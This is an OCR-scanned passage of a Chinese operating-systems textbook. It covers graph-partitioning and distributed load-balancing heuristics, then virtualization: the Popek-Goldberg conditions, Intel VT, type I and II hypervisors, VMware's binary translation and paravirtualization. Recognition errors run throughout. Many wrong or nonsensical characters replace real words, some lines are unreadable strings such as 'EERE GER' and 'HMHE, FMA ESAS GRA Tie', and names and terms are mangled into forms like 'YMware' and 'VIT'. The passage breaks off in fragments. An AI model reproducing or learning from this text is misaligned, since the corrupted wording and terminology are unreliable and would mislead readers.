件 下 如 每 个 子 图 对 整个 CPU 和 存储 占 的 需求 低 于 某 些 限 制 ) ， 寻 找 一 
个 将 图 分 割 “切割 ) 为 k 个 互 不 连接 的 子 图 的 方法 。 对 于 每 个 满足 限制 
条 件 的 解决 方案 ， 完 全 在 单个 子 图 内 的 踊 代 表 了 机 需 内 部 的 通信 ， 可 以 
忽略 。 从 一 个 子 图 通 向 男 一 个 子 图 的 弧 代表 网 络 通 信 。 目 标 是 找 出 可 以 
使 网 络 流量 最 小 同时 满足 所 有 的 限制 条 件 的 分 割 方 法 。 作 为 一 个 例子 ， 
图 8-24 给 出 了 一 个 有 9 个 进程 的 系统 ， 这 9 个 进程 是 进程 A 至 I， 每 个 弧 上 
标 有 两 个 进程 之 间 的 平均 通信 负载 “例如 ， 以 Mbps 为 单位 ) 。 








在 图 8-24a 中 ， 我 们 将 有 进程 A、E 和 G 的 图 划分 到 节点 1 上 ， 进 程 
B、F 和 理 划 分 在 节点 2 上 ， 而 进程 C、DD 和 I 划分 在 节点 3 上 。 整 个 网 络 流 
EERE GER) 的 弧 上 的 流量 之 和 ， 即 30 个 蛙 位 。 在 图 8-24b 中 ， 
有 一 种 不 同 的 划分 方法 ， 只 有 28 个 单位 的 网 络 流 量 。 假 设 该 方法 满足 所 
有 的 存储 器 和 CPU 的 限制 条 件 ， 那 么 这 个 方法 就 是 一 个 更 好 的 选择 ， 因 


为 它 需 要 较 少 的 通信 流量 。 





~ 
1 DD 和 I 之 间 
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的 流量 





图 8-24 将 9 个 进程 分 配 到 3 个 节点 上 的 两 种 方法 


HMHE, FMA ESAS GRA Tie) WR 
(cluster) ， 并 且 与 其 他 的 徐 有 较 少 的 交互 ( 艇 外 低 流 量 ) 。 讨 论 这 些 
问题 的 最 早 的 论文 是 (Chow 和 Abraham，1982; Lo, 1984; Stone 和 


Bokhari，1978) 等 。 
2. 发 送 者 发 起 的 分 布 式 启发 算法 


现在 看 一 些 分 布 式 算法 。 有 一 个 算法 是 这 样 的 ， 当 进程 创建 时 ， 它 
就 运行 在 创建 它 的 节点 上 ， 除 非 该 节点 过 载 了 。 过 载 节 点 的 度量 可 能 涉 
及 太 多 的 进程 ， 过 大 的 工作 集 ， 或 者 其 他 度量 。 如 果 过 载 了 ， 该 节点 随 
机 选择 另 一 个 节点 并 询问 它 的 负载 情况 《使 用 同样 的 度量 ) 。 如 果 被 探 
查 的 节点 负载 低 于 东 个 装 值 ， 就 将 新 的 进程 送 到 该 节点 上 《〈Eager 等 
人 ，1986) 。 如 果 不 是 ， 则 选择 男 一 个 机 器 探查 。 探 查 工 作 并 不 会 永远 
进行 下 去 。 在 N 次 探查 之 内 ， 如 果 没 有 找到 合适 的 主机 ， 算 法 就 终止 ， 
且 进 程 继续 在 原 有 的 机 器 上 运行 。 整 个 算法 的 思想 是 负载 较 重 的 节点 试 











图 忆 挥 超额 的 工作 ， 如 图 8-25a 所 示 。 该 图 描述 了 发 送 者 发 起 的 负载 平 


衡 。 
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图 8-25 人 过 载 的 节点 寻找 可 以 接收 进程 的 轻 载 节点 ;) D) 一 个 空 节点 
寻找 工作 做 


Eager 等 人 《1986) 构造 了 一 个 该 算法 的 分 析 排 队 模型 (queueing 
model) 。 使 用 这 个 模型 ， 所 建立 的 算法 表现 民 好 而 且 在 包括 不 同 的 效 
值 、 传 输 成 本 以 及 探查 限定 等 大 范围 的 参数 内 工作 稳定 。 


但 是 ， 应 该 看 到 在 负载 重 的 条 件 下 ， 所 有 的 机 器 都 会 持续 地 对 其 他 
机 融 进 行 探 碍 ， 徒 务 地 试图 找到 一 合 愿 意 接收 更 多 工作 的 机 器 。 几 乎 没 
有 进程 能 够 被 番 载 ， 可 是 这 样 的 符 试 会 带 来 巨大 的 开销 。 








3. 接 收 者 及 起 的 分 布 式 局 发 算法 


上 面 所 给 出 的 算法 是 由 一 个 过 载 的 友 送 者 发 起 的 ， 它 的 一 个 互补 算 





法 是 由 一 个 轻 载 的 接收 者 及 起 的 ， 如 图 8-25b 所 示 。 在 这 个 算法 中 ， 只 

要 有 一 个 进程 结束 ， 系 统 就 检查 是 否 有 足够 的 工作 可 做 。 如 果 不 是 ， 它 
随机 选择 东台 机 器 并 要 求 它 提供 工作 。 如 果 该 台 机 需 没 有 可 提供 的 工 

作 ， 会 接着 询问 第 二 台 ， 然 后 是 第 三 台 机 器 。 如 果 在 N 次 探查 之 后 ， 还 
是 没有 找到 工作 ， 该 节点 暂时 停止 询问 ， 去 做 任何 已 经 安排 好 的 工作 ， 
而 在 下 一 个 进程 结束 之 后 机 器 会 再 次 进行 询问 。 如 宁 没 有 可 做 的 工作 ， 
机 峰 就 开始 空 亲 。 在 经 过 固定 的 时 间 间 隔 之 后 ， 它 又 开始 探查 。 





这 个 算法 的 优 点 是 ， 在 关键 时 刻 它 不 会 对 系统 增加 额外 的 负担 。 发 
送 者 用 起 的 算法 在 机 器 最 不 能 够 容忍 时 一 一 此 时 系统 已 是 负载 相当 重 
了 ， 做 了 大 量 的 探 得 工作 。 有 了 接收 者 发 起 算法 ， 当 系统 负载 很 重 时 ， 
人 台 机 需 处 于 非 充 分 工作 状态 的 机 会 是 很 小 的 。 但 是 ， 当 这 种 情形 确实 
发 生 时 ， 它 就 会 较 容 易 地 找到 可 承接 的 工作 。 当 然 ， 如 果 没 有 什么 工作 
可 做 ， 接 收 者 用 起 算法 也 会 制造 出 大 量 的 探查 流量 ， 因 为 所 有 失业 的 机 
器 都 在 拼命 地 寻找 工作 。 不 过 ， 在 系统 轻 载 时 增加 系统 的 负载 要 远 远 好 
于 在 系统 过 载 时 再 增加 负载 。 

















把 这 两 种 算法 组 合 起 来 是 有 可 能 的 ， 当 机 器 工 作 太 多 时 可 以 试图 各 
掉 一 些 工 作 ， 而 在 工作 不 多 时 可 以 尝试 得 到 一 些 工作 。 此 外 ， 机 器 也 许 
可 以 通过 保留 一 份 以 往 探 查 的 历史 记录 (用 以 确定 是 否 有 机 器 经 常 性 处 
于 轻 载 或 过 载 状态 ) 来 对 随机 轮 询 的 方法 进行 改进 。 可 以 首先 答 试 这 些 
机 需 中 的 某 一 合 ， 这 取决 于 发 起 者 是 试图 番 掉 工作 还 是 获得 工作 。 


8.3 ”虚拟 化 


在 某 些 环境 下 ， 一 个 机 构 拥 有 多 计算 机 系统 ， 但 事实 上 却 并 不 真正 
需要 它 。 一 个 常见 的 例子 是 ， 一 个 公司 同时 拥有 一 台电 子 邮件 服务 器 、 
台 Web 服 务 器 、 一 台 FTP 服 务 器 、 一 些 电子 商务 服务 器 和 其 他 服务 
器 。 这 些 服务 器 运行 在 同一 个 设备 架 上 的 不 同 计算 机 中 ， 彼 此 之 间 以 高 
速 网 络 连 接 ， 也 就 是 说 ， 组 成 一 个 多 计算 机 系统 。 在 有 些 情况 下 ， 这 些 
R 务 器 运行 在 不 同 的 机 器 上 是 因为 单独 的 一 台 机 器 难以 承受 这 样 的 负 
， 但 是 在 更 多 其 他 的 情况 下 ， 这 些 服 务 器 不 能 作为 进程 运行 在 同一 台 
机 器 上 最 重要 的 原因 是 可 靠 性 (reliability) : 现实 中 不 能 相信 操作 系统 
可 以 一 天 24 小 时 ， 一 年 365 或 366 天 连续 无 故障 地 运行 。 通 过 把 每 个 服务 
器 放 在 不 同 机 器 上 的 方法 ， 即 使 其 中 的 一 台 服 务 器 骨 溃 了 ， 至 少 其 他 的 
服务 器 不 会 受到 影响 。 虽 然 这 样 做 能 够 达到 容错 的 要 求 ， 但 是 这 种 解决 
方法 太 过 昂贵 且 难 以 管理 ， 因 为 涉及 太 多 的 机 器 。 


$o 








那 应 该 怎么 做 呢 ? 已 经 有 了 四 十 多 年 发 展 历史 的 虚拟 机 技术 ， 通 币 
简称 为 虚拟 化 〈virtualization) ， 作 为 一 种 解决 方法 被 担 了 出 来 ， 就 像 
我 们 在 1.7.5 小 市 中 所 讨论 的 那样 。 这 种 技术 允许 一 台 机 器 中 存在 多 台 虚 
拟 机 ， 每 一 台 虚 拟 机 可 能 运行 不 同 的 操作 系统 。 这 种 方法 的 好 处 在 于 ， 
一 台 虚 拟 机 上 的 错误 不 会 自动 地 使 其 他 虚拟 机 朋 尝 。 在 一 个 虚拟 化 系统 
中 ， 不 同 的 服务 器 可 能 运行 在 不 同 的 虚拟 机 中 ， 因 此 保持 了 多 计算 机 系 











统 局 部 性 错误 的 模型 ， 但 是 代价 更 低 、 也 更 易于 维护 。 


当然 ， 如 此 来 联合 服务 器 看 起 来 就 像 是 把 所 有 的 鸡 便 放 在 一 个 篮 
里 一 样 。 如 果 运 行 所 有 虚拟 机 的 服务 器 月 误 了 ， 其 结果 比 单 独 一 台 专用 
服务 露骨 涡 要 严重 得 多 。 但 是 虚拟 化 技术 能 够 起 作用 的 原因 在 于 大 多 数 
服务 嚣 集 机 的 原因 不 是 因为 硬件 的 故障 ， 而 是 因为 爱 肿 、 不 可 徘 、 有 涯 
洞 的 软件 ， 特 别 是 操作 系统 。 使 用 虚拟 化 技术 ， 人 惟一 一 个 运行 在 内 核 态 
的 软件 是 管理 程序 (hypervisor) ， 它 的 代码 量 比 一 个 完整 操作 系统 的 
代码 量 少 两 个 数量 级 ， 也 就 意味 着 软件 中 的 漏洞 数 也 会 少 两 个 数量 级 。 











除了 强大 的 隔离 性 ， 在 虚拟 机 上 运行 软件 还 有 其 他 的 好 处 。 其 中 之 
一 就 是 减少 了 物理 机 器 的 数量 从 而 节省 了 硬件 、 电 源 的 开 文 以 及 占用 更 
少 的 空间 。 对 于 一 个 公司 ， 比 如 说 亚马逊 (Amazon) 、 雅 虎 
(Yahoo) 、 微 软 (Microsoft) 以 及 谷歌 (Google) , ‘EMA RTE 
万 的 服务 器 运行 不 同 的 任务 ， 减 少 它们 数据 中 心 对 物理 机 器 的 需求 意味 
着 节省 一 大 笔 开 支 。 举 个 有 代表 性 的 例子 ， 在 大 公司 里 ， 不 同 的 部 门 或 
小 组 想 出 了 一 个 有 趣 的 想法 ， 然 后 去 买 一 台 服 务 器 来 实现 它 。 如 果 想 法 
不 断 产 生 ， 就 需要 成 百 上 千 的 服务 器 ， 公 司 的 数据 中 心 就 会 扩张 。 把 一 
款 软件 移动 到 已 有 的 机 器 上 通常 会 很 困难 ， 这 是 因为 每 一 款 软件 都 需要 
一 个 特定 版 本 的 操作 系统 ， 软 件 自身 的 函数 库 ， 配 置 文件 等 。 使 用 虚拟 
机 ， 每 款 软件 都 可 以 携带 属于 自己 的 环境 。 








虚拟 机 的 另 一 个 好 处 在 于 检查 点 和 虚拟 机 的 迁移 〈 例 如 ， 在 多 个 服 


务 器 间 迁 移 以 达到 负载 平衡 ) 比 在 一 个 普通 的 操作 系统 中 进行 进程 迁移 
更 加 容易 。 在 后 一 种 情况 下 ， 相 当 数 量 的 进程 关键 状态 信息 都 被 保存 在 
操作 系统 表 当 中 ， 包 括 与 打开 文件 、 警 报 、 信 和 号 处 理 函 数 等 有 关 的 信 
恩 。 当 迁移 一 个 虚拟 机 的 时 候 ， 所 需要 移动 的 仅仅 是 内 存 映 像 ， 因 为 在 
移动 内 存 映像 的 同时 所 有 的 操作 系统 表 也 会 移动 。 








虚拟 机 的 妃 一 个 用 途 是 运行 那些 不 再 被 文 持 或 不 能 在 当前 硬件 上 工 
作 的 操作 系统 或 操作 系统 版 本 〉 中 的 遗留 应 用 程序 (legacy 
application〉。 这 些 应 用 程序 可 以 和 当前 的 应 用 程序 在 相同 的 人 硬件 上 运 
行 。 事 实 上 ， 文 持 同 时 运行 使 用 不 同 操作 系统 的 应 用 程序 是 赞成 虚拟 机 
技术 的 一 个 重要 理由 。 





同时 ， 虚 拟 机 的 一 个 重要 应 用 是 软件 开发 。 一 个 程序 员 想 要 确保 他 
的 软件 在 windows 98、Windows 2000、Windows XP、Windows Vista、 
多 种 Linux 版 本 、FreeBSD、OpenBSD、NetBSD 和 Mac OS X 上 都 可 以 正 
常 运行 ， 他 不 需要 有 一 打 的 计算 机 ， 以 及 在 不 同 的 计算 机 上 安装 不 同 的 
操作 系统 。 相 反 ， 他 只 需要 在 一 台 物 理 机 上 创建 一 些 虚 拟 机 ， 然 后 在 每 
个 虚拟 机 上 安装 不 同 的 操作 系统 。 当 然 ， 这 个 程序 员 可 以 给 他 的 磁盘 分 
区 ， 然 后 在 每 个 分 区 上 安装 不 同 的 操作 系统 ， 但 是 这 种 方法 太 过 困难 。 
首先 ， 不 论 人 磁盘 的 容量 有 和 多大， 标准 的 PC 机 只 支持 四 个 主 分 区 。 其 
次 ， 尽 管 在 引导 块 上 可 以 安装 一 个 多 引导 程序 ， 但 要 运行 另 一 个 操作 系 
统 就 必须 重启 计算 机 。 使 用 虚拟 机 ， 所 有 的 操作 系统 可 以 同时 运行 ， 因 











为 它们 都 只 是 美妙 的 进程 。 


8.3.1 虚拟 化 的 条 件 


我 们 在 第 1 章 中 看 到 ， 有 两 种 虚拟 化 的 方法 。 一 种 管理 程序 
(hypervisor) ， 又 称 为 I 型 管理 程序 〈 或 虚拟 机 监控 器 ) ， 如 图 1-29a 所 
示 。 实 质 上 ， 它 就 是 一 个 操作 系统 ， 因 为 它 是 惟一 一 个 运行 在 内 核 态 的 
程序 。 它 的 工作 是 支持 真实 硬件 的 多 个 副本 ， 也 称 作 虚 拟 机 (virtual 
machine) ， 与 普通 操作 系统 所 支持 的 进程 类 似 。 相 反 ，II 型 管理 程序 ， 
如 图 1-29b 所 示 ， 是 一 种 完全 不 同 的 类 型 。 它 只 是 一 个 运行 在 诸如 
Windows 或 Linux 平 台 上 ， 能 够 “解释 ?机 器 指令 集 的 用 户 程序 ， 它 也 创建 
了 一 个 虚拟 机 。 我 们 把 “解释 ”二 字 加 上 引号 是 因为 通常 代码 块 是 以 特殊 
的 方式 进行 处 理 然 后 缓存 并 且 直 接 执行 从 而 获得 性 能 上 的 提升 ， 但 是 在 
原理 上 ， 完 全 解释 也 是 可 行 的， 虽然 速度 很 慢 。 两 种 情况 下 ， 运 行 在 管 
理 程序 上 的 操作 系统 都 称 为 客户 操作 系统 (guest operating system) 。 在 
II 型 管理 程序 的 情况 下 ， 运 行 在 硬件 上 的 操作 系统 称 为 宿主 操作 系统 


(host operating system) 。 


























在 两 种 情况 下 ， 虚 拟 机 都 必须 像 真 实 机 器 一 样 工 作 ， 认 识 到 这 一 点 
非常 重要 。 也 惑 是 次 ， 必 须 能 够 像 真 实 机 需 那 样 局 动 虚拟 机 ， 像 真实 的 
机 器 那样 在 其 上 安 交 任意 的 操作 系统 。 管 理 程序 的 任务 就 是 提供 这 种 错 
觉 ， 并 且 尽 量 高 效 〈 不 能 完全 解释 执行 ) 。 


虚拟 机 有 两 种 类 型 的 原因 与 Intel 386 体 系 结构 的 缺 隐 有关， 而 这 些 
缺陷 在 20 年 间 以 向 后 兼容 的 名 义 被 盲目 地 不 断 推进 到 新 的 CPU 中 。 简 单 
地 说 ， 每 个 有 内 核 态 和 用 户 态 的 处 理 器 都 有 一 组 只 能 在 内 核 态 执行 的 指 
令 集 合 ， 比 如 IO 指令 、 改 变 MMU 状 态 的 指令 等 。Popek 和 
Goldberg (1974) 两 人 在 他 们 的 经 典 虚 拟 化 工作 中 称 这 些 指令 为 敏感 指 
令 (sensitive instruction) 。 还 有 一 些 指 令 如 果 在 用 户 态 下 执行 会 引起 陷 
入 。Popek 和 Goldberg 称 它们 是 特权 指令 (privileged instruction) 。 在 他 
们 的 论文 中 首次 论述 指出 ， 当 且 仅 当 敏 感 指 令 是 特权 指令 的 子 集 时 ， 机 
器 才 是 可 虚拟 化 的 。 简 单 地 说 ， 如 果 你 想 做 一 些 在 用 户 态 下 不 能 做 的 工 
作 ， 硬 件 应 该 陷入 。IBM/370 具 有 这 种 特性 ， 但 是 与 它 不 同 ，386 体 系 结 
构 不 具有 这 种 特性 。 有 一 些 敏 感 的 386 指 令 如 果 在 用 户 态 下 执行 就 会 被 
忽略 。 举 例 来 说 ，POPF 指 令 蔡 换 标志 寄存 器 ， 会 改变 允许 /禁止 中 断 的 
标志 位 。 但 是 在 用 户 态 下 ， 这 个 标志 位 不 被 改变 。 所 以 ，386 体 系 结构 
和 它 的 后 代 都 是 不 可 虚拟 化 的 ， 也 就 是 说 它们 不 能 支持 I 型 管理 程序 。 














事实 上 ， 情 况 比 上 面 描述 的 还 要 更 粳 糕 一 些 。 除 了 茶 些 指令 在 用 户 
态 不 能 陷入 之 外 ， 还 有 一 些 指令 可 以 在 用 户 态 读 取 敏 感 状 态 而 不 引起 陷 
入 。 比 如 ， 在 Pentium 处 理 器 上 ， 一 个 程序 可 以 读 取代 码 段 选择 子 
(selector) 的 值 从 而 判断 它 是 运行 在 用 户 态 还 是 内 核 态 上 。 如 果 一 个 操 
作 系 统 做 同样 的 事情 ， 然 后 发 现 它 运行 在 用 户 态 ， 那 么 就 可 能 据 此 作出 
不 正确 的 判断 。 














从 2005 年 开始 ，Intel 和 AMD 公 司 在 它们 的 处 理 器 上 引进 了 虚拟 化 技 
术 ， 从 而 使 问题 得 到 了 解决 。 在 Intel Core 2CPU 上 ， 这 种 技术 称 为 
VT (Virtualization Technology) 。 在 AMD Pacific CPU 上 ， 这 种 技术 称 
为 SVM (Secure Virtual Machine) 。 在 下 文 里 ， 我 们 一 般 使 用 VIT 这 个 词 
来 代表 。 它 们 的 灵感 都 来 自 于 IBM VM/370， 但 是 也 有 一 些 细微 的 不 同 
之 处 。 基 本 的 思想 是 创建 容器 使 得 虚拟 机 可 以 在 其 内 运行 。 当 一 个 客户 
操作 系统 在 一 个 容器 内 启动 ， 它 将 继续 运行 直到 它 引 发 了 异常 而 陷入 到 
管理 程序 。 例 如 ， 执 行 一 条 LO 指令 。 陷 入 操作 由 管理 程序 通过 硬件 位 
图 集 来 管理 。 有 了 这 些 扩展 ， 经 典 的 “陷入 -仿真 ”类 型 的 虚拟 化 方法 才 
成 为 可 能 。 














8.3.2 ”I 型 管理 程序 


可 虚拟 化 是 一 个 重要 的 问题 ， 所 以 让 我 们 来 更 仔细 地 研究 一 下 。 在 
图 8-26 中 ， 我 们 可 以 看 到 一 个 文 持 一 台 虚 拟 机 的 I 型 管理 程序 。 像 所 有 的 
I 型 管理 程序 一 样 ， 它 在 裸 机 上 运行 。 虚 拟 机 在 用 户 态 以 用 户 进 程 的 号 
份 运行 ， 因 此 ， 它 不 允许 执行 敏感 指令 。 虚 拟 机 内 运行 着 一 个 客户 操作 
系统 ， 访 客户 操作 系统 认为 自己 是 运行 在 内 核 态 的 ， 但 是 实际 上 它 是 运 
行 在 用 户 态 的 。 我 们 把 这 种 状态 称 为 虚拟 内 核 态 (virtual kernel 
mode) 。 虚 拟 机 内 还 运行 着 用 户 进 程 ， 这 些 进程 认为 自己 是 运行 在 用 
户 态 的 (事实 上 也 正 是 如 此 〉。 





用 户 进程 
虚拟 机 用 户 态 
客户 操作 系统 虚拟 内 核 态 












I 型 管理 程序 访问 特权 指令 时 陷入 


} 内 核 态 


图 8-26 当 虚 拟 机 当中 的 操作 系统 执行 了 一 个 内 核 指 令 时 ， 如 果 支 持 
虚拟 化 技术 ， 那 么 它 会 陷入 到 管理 程序 


当 操作 系统 〈 认 为 目 己 运行 在 内 核 态 ) 执行 一 条 敏感 指令 (只 在 内 


核 态 下 可 以 执行 ) 的 时 候 会 发 生 什么 事情 呢 ? 在 不 支持 VT 技术 的 处 理 
器 上 ， 指 令 失效 并 且 操 作 系统 通常 情况 下 会 朋 吝 。 这 意味 着 虚拟 化 是 不 
可 行 的 。 有 人 争辩 说 所 有 在 用 户 态 执行 的 敏感 指令 都 应 该 陷入 ， 但 那 不 
是 386 和 它 的 non-VT 后 代 们 的 工作 模式 。 








在 支持 VT 技术 的 处 理 器 上 ， 当 客户 操作 系统 运行 一 条 敏感 指令 
时 ， 发 生 到 内 核 的 陷入 ， 如 图 8-26 所 示 。 管 理 程序 分 析 指 令 ， 碍 看 它 是 
来 自 于 虚拟 机 中 的 客户 操作 系统 还 是 来 自 于 虚拟 机 中 的 用 户 程序 。 如 果 
是 前 一 种 情况 ， 管 理 程 序 调度 将 要 执行 的 指令 ; 如果 是 后 一 种 情况 ， 它 
仿真 面 对 运 行 在 用 户 态 的 敏感 指令 时 真实 硬件 的 行为 。 如 果 虚 拟 机 不 支 
持 VT 技 术 ， 指 令 通 常会 被 忽略 ; 如 果 虚 拟 机 支持 VT 技术 ， 它 陷入 到 虚 
拟 机 的 客 己 操作 系统 中 。 











8.3.3 HI 型 管理 程序 





当 采 用 VT 技术 的 时 候 ， 建 立 一 个 虚拟 机 系统 相对 比较 直接 ， 但 是 
在 VT 技术 出 现 之 前 ， 人 们 是 怎么 做 的 呢 ? 很 明显 ， 在 一 台 虚 拟 机 上 运 
行 完整 的 操作 系统 是 不 可 行 的 ， 因 为 (一 些 ) 敏感 指令 会 被 忽略 掉 ， 从 
而 导致 系统 崩 演 。 于 是 人 们 发 明了 称 为 HI 型 管理 程序 的 替代 品 ， 如 图 1- 
29b 所 示 。 最 早 的 一 代 产 品 是 YMware (Adams 和 Agesen，2006; 以 及 





Waldspurger, 2002) ， 它 是 斯 坦 福 大 学 〈《Bugnion 等 人 ，1997) DISCO 
研究 项 目的 发 展 成 果 。VMware 在 Windows 或 Linux 的 宿主 操作 系统 上 作 
为 普通 用 户 程序 运行 。 当 它 第 一 次 运行 的 时 候 ， 它 就 像 是 一 个 新 启动 的 
计算 机 ， 试 图 在 光驱 中 寻找 含有 操作 系统 的 光盘 。 然 后 通过 运行 光盘 上 
的 安装 程序 ， 在 它 的 虚拟 磁盘 《实际 上 就 是 Windows 或 Linux 文 件 ) 上 
安装 操作 系统 。 一 旦 在 虚拟 磁盘 上 安装 好 了 客户 操作 系统 ， 虚 拟 机 就 可 
以 运行 了 。 








现在 让 我 们 来 仔细 研究 VMware 是 如 何 工 作 的 。 当 运行 一 个 Pentium 
二 进 制 文件 的 时 候 ， 这 个 二 进 制 文件 可 能 来 自 于 安装 光盘 或 虚拟 磁盘 ， 
VMware 首先 浏览 代码 段 以 寻找 基本 块 〈basic block) 。 上 所 谓 基本 块 ， 是 
指 以 jump 指 令 、cal 指 令 、trap 指 令 或 其 他 改变 控制 流 的 指令 结束 的 可 顺 
序 运行 的 指令 序列 。 根 据 定 义 ， 除 了 基本 块 的 最 后 一 条 指令 ， 基 本 块 内 
不 会 含有 其 他 改变 程序 计数 器 的 指令 。 检 查 基 本 块 是 为 了 找 出 该 基本 块 








中 是 否 含有 敏感 指令 〈 见 Popek 和 Goldberg 的 论述 ) 。 如 果 基 本 块 中 含 
有 敏感 指令 ， 每 条 敏感 指令 被 蔡 换 成 处 理 相应 情况 的 VMware 过 程 调 
用 。 基 本 块 的 最 后 一 条 指令 也 被 VMware 的 过 程 调 用 所 蔡 代 。 


上 述 操作 完成 之 后 ， 基 本 块 在 VMware 中 缓存 并 执行 。 在 VMware 
中 ， 不 含 任 何 敏 感 指令 基本 块 的 运行 与 它 在 裸 机 上 的 运行 完全 相同 
因为 它 就 是 在 裸 机 上 运行 的 。 通 过 这 种 方式 找 出 、 仿 真 敏感 指令 。 这 种 
技术 称 为 二 进 制 翻译 (binary translation) 。 





基本 块 执行 结束 之 后 ， 控 制 返回 到 VMware， 它 会 定位 下 一 个 基本 
块 的 位 置 。 如 果 下 一 个 基本 块 已 经 翻译 完毕 ， 它 就 可 以 被 并 刻 执行 。 如 
果 还 没有 翻译 完毕 ， 那 么 依次 进行 翻译 、 缓 存 、 执 行 。 最 后 ， 大 多 数 程 
序 被 缓存 并 且 接 近 全 速 的 执行 。 很 多 优化 方法 得 到 了 运用 ， 例 如 ， 如 宋 
一 个 基本 块 跳 转 或 调用 为 一 个 基本 块 ， 最 后 一 条 指令 修一 条 跳 转 或 调用 
己 翻 译 好 的 基本 块 的 指令 所 代 蔡 ， 从 而 节省 了 寻找 后 续 基 本 块 的 开销 。 
同样 ， 在 用 户 程序 中 不 需要 丛 换 把 敏感 指令 ;因为 便 件 会 下 接 忽略 筷 
们 。 














讲 到 这 里 ， 即 使 在 不 可 虚拟 化 的 硬件 上 ，IHI 型 管理 程序 也 能 正常 工 
作 的 原因 融 已 经 很 清楚 了 : 所 有 的 敏感 指令 被 仿真 这 些 指令 的 过 程 调用 
所 蔡 代 。 客 户 操 作 系 统 发 财 的 敏感 指令 不 会 被 真正 的 人 硬件 执行 。 它 们 转 
换 成 了 对 管理 程序 的 调用 ， 而 这 些 调用 仿真 了 那些 敏感 指令 。 














有 人 可 能 会 天 真 地 认为 支持 VT 技术 的 处 理 器 在 性 能 上 会 胜 过 II 型 管 
理 程 序 所 使 用 的 软件 技术 ， 但 是 测量 结果 显示 情况 并 不 是 这 么 简单 
(Adams 和 Agesen，2006) 。 其 结果 显示 ， 支 持 VT 技 术 的 硬件 使 用 陷入 
一 一 仿真 的 方法 会 引起 太 多 的 陷入 ， 而 在 现代 硬件 上 ， 陷 入 的 代价 是 非 
常 昂贵 的 ， 它 们 会 清空 处 理 器 内 的 缓存 、TLB 和 分 支 预测 表 。 相 反 ， 当 
可 执行 程序 中 的 敏感 指令 被 VMware 过 程 调用 所 蔡 代 ， 就 不 会 招致 这 些 
切换 开销 。 正 如 Adams 和 Agesen 所 指出 的 ， 根 据 工 作 负 载 的 不 同 ， 软 件 
有 的 时 候 会 击败 硬件 。 由 于 这 个 原因 ， 一 些 I 型 管理 程序 出 于 对 性 能 的 
考虑 会 进行 二 进 制 翻译 ， 尽 管 即使 不 进行 转换 ， 运 行 于 其 上 的 软件 也 可 
以 正确 运行 。 











8.3.4” 准 虚拟 化 


运行 在 型 和 II 型 管理 程序 之 上 的 都 是 没有 修改 过 的 客户 操作 系统 ， 
但 是 这 两 类 管理 程序 为 了 获得 合理 的 性 能 都 备 受 束 获 。 另 一 个 逐渐 开始 
流行 起 来 的 处 理 方法 是 更 改 客 户 操作 系统 的 源 代 码 ， 从 而 略 过 敏感 指令 
的 执行 ， 转 而 调用 管理 程序 调用 。 事 实 上 ， 对 客户 操作 系统 来 说 吏 像 是 
用 户 程 序 调用 操作 系统 《管理 程序 ) 系统 调用 一 样 。 当 采用 这 种 方法 
时 ， 管 理 程 序 必 须 定 义 由 过 程 调 用 集合 组 成 的 接口 以 供 客户 操作 系统 使 
用 。 这 个 过 程 调用 集合 实际 上 形成 了 API《〈 应 用 程序 编程 接口 ) ， 尽 管 
这 个 接口 是 供 客户 操作 系统 使 用 ， 而 不 是 应 用 程序 。 














再 进一步 ， 从 操作 系统 中 移 除 所 有 的 敏感 指令 ， 只 让 操作 系统 调用 
管理 程序 调用 Chypervisor call) 来 获得 诸如 IO 操作 等 系统 服务 ， 通 过 
这 种 方式 我 们 就 已 经 把 管理 程序 变 成 了 一 个 微 内 核 ， 如 图 1-26 所 示 。 一 
些 或 全 部 敏感 指令 有 意 移 除 的 客户 操作 系统 称 为 准 虚 拟 化 的 
(paravirtualized) (Barham 等 人 ，2003; Whitaker 等 人 ，2002) 。 仿 真 
特殊 的 机 器 指令 是 一 件 让 人 厌倦 的 、 耗 时 的 工作 。 它 需要 调用 管理 程 
序 ， 然 后 仿真 复杂 指令 的 精确 语义 。 让 客户 操作 系统 直接 调用 管理 程序 
《或 者 微 内 核 ) 完成 IO 操 作 等 任务 会 更 好 。 之 前 的 管理 程序 都 选择 模 
拟 完整 的 计算 机 ， 其 主要 原因 在 于 客户 操作 系统 的 源 代码 不 可 获得 (如 
Windows) 、 或 源 代码 种 类 太 多 样 ( 如 Linux) 。 也 许 在 将 来 ， 管 理 程 








序 / 微 内 核 的 API 接 口 可 以 标准 化 ， 然 后 后 续 的 操作 系统 都 会 调用 该 API 
接口 而 不 是 执行 敏感 指令 。 这 样 的 做 法 将 使 得 虚拟 机 技术 更 容易 被 文 持 
和 使 用 。 





全 虚拟 化 和 准 虚拟 化 之 间 的 区 别 如 图 8-27 所 示 。 在 这 里 ， 我 们 有 两 
台 虚 拟 机 运行 在 支持 VT 技术 的 人 硬件 上 。 左 边 ， 客 户 操 作 系 统 是 一 个 没 
有 经 过 修改 的 Windows 版 本 。 当 执行 敏感 指令 的 时 候 ， 硬 件 陷入 到 管理 
程序 ， 由 管理 程序 仿真 执行 它 随 后 返回 。 右 边 ， 客 户 操作 系统 是 一 个 经 
过 修改 的 Linux 版 本 ， 其 中 不 含 敏 感 指 令 。 当 它 需 要 进行 WO 操作 或 修改 
重要 内 部 寄存 器 (如 指向 页 表 的 寄存 器 〉 时 ， 它 调用 定理 程 友 例 程 来 完 
成 这 些 工作 ， 惑 像 在 标准 Linux 系 统 中 应 用 程序 调用 操作 系统 系统 调用 
一 样 。 





如 图 8-27 所 示 ， 管 理 程序 被 一 条 虚线 分 成 两 个 部 分 。 而 在 现实 中 ， 
只 有 一 个 程序 在 人 硬件 上 运行 。 它 的 一 部 分 用 来 解释 陷入 的 敏感 指令 ， 这 
种 情况 下 ， 请 参照 Windows 一 边 。 另 一 部 分 用 来 执行 管理 程序 例 程 。 在 
图 8-27 中 ， 后 一 部 分 被 标记 为 “ 微 内 核 >。 如 果 管 理 程序 只 是 用 来 运行 准 
虚拟 化 的 客户 操作 系统 ， 就 不 需要 对 敏感 指令 进行 仿真 ， 这 样 ， 我 们 就 
获得 了 一 个 真正 的 微 内 核 ， 这 个 微 内 核 只 提供 最 基本 的 服务 ， 诸 如 进程 
分 派 、 省 理 MMU 等 。I 型 管理 程序 和 微 内 核 之 间 的 界限 越 来 越 模 糊 ， 妆 
管理 程序 获得 越 来 越 多 的 功能 和 例 程 时 ， 这 个 界限 变 得 更 加 不 清晰 。 这 
个 主题 是 有 争议 的 ， 但 是 这 一 点 越 来 越 明 确 : 以 内 核 态 运 行 在 硬件 上 的 


了 Ht 

















